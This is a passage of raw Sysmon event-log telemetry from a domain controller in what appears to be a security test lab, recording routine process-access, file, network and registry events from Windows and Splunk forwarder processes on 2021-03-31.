12:04:09.540{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6539-6064-2301-00000000AE01}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.540{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6539-6064-2301-00000000AE01}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:09.541{266CAFBE-6539-6064-2301-00000000AE01}6644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000009049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:10.851{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=929BBEB6F3E9B485A0A9554125FDF7CE,SHA256=D1D43993C0D6C8112E39637F8CA12211B81A5AF855EEF19CDD2E5BCB1E841F0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:11.865{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AECC3A0DBD7E5502ECD600E51C7CA804,SHA256=CC34F9AE0117B1706DB6DD8C70B1513DD81C2BD3969F563F6E823CA870F2730E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:12.879{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C2D9DF1F6B9FD1934B68C81A11EECD3,SHA256=81FB841FEACD3CE9C1F322BB9E4EC8B920F23BB5D8C33C76CFBB3EE125927034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:13.878{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AAFCDE25F84B93614EF9A90BD52774,SHA256=BB8FB65DC4B517B09A9117DD7101EEC10484877A1D657C0BAE3920A3CCD5C5F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:12.416{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53622-false10.0.1.12-8000- 13241300x80000000000000009054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:13.051{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0xf702b956) 23542300x80000000000000009053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:13.004{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B6B1A164AECB6DE8BF01815915D7762C,SHA256=23D7F0427466D6E6EA1F32E8B83B47B9B4EF4893B2FC79014A2DA76975036EC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:13.004{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3D5A23AD7F61191D5CEF9875E1B833BD,SHA256=2C07051BD8CE0FC80F5AD35F57F1C6673A758ED56DAC2878E77D6EC43A9C4F2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:14.892{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DB07C88B0BF5D92969CEF89E246769B,SHA256=B3AE53D06AC9193A7EDEF3F93D872AB509643CFEA6646ED7AD20A71C88AA338C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:15.891{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5F48D364648F0A50C0DA5B0489DBF3E,SHA256=F4A734E913BDE51A92CF7253FE661A54EB237481E7CEB0A7FD176CB6745E2C42,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:14.479{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53623-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000009060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:14.479{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53623-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x80000000000000009059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:15.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F7E7FBAB430A5EB636F48829EED7D11,SHA256=1717DBDF54C26D82EA9F4EDBC081C2A3A6DB98B4F322AE64C32340618532CCE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:15.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89D27D7DCB8730B3E533AF4A30927771,SHA256=D72EE45A4E33B542C923B62DE59F868C5EF290A5798C56FBF9BC62C11AEB85F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:16.921{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF4A5E661CF1A2EFAF104FA78AD51C52,SHA256=9819C591BC4EB0F234233561D715B2FC3E4B46401B49575BD3EFEE0BB15963F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:17.557{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53624-false10.0.1.12-8000- 23542300x80000000000000009064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:17.998{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EC105B4B8AC453CB15ECB3034EAD76E,SHA256=3EA2C0C37C1DE42BB10474F2D57096D0292DF3C2635624C4D43218D0A29AD068,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.153{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.153{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.153{266CAFBE-64C5-6064-A500-00000000AE01}43565576C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565532C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.137{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.121{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.106{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.106{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6543-6064-2401-00000000AE01}6476C:\Windows\System32\NOTEPAD.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:19.090{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 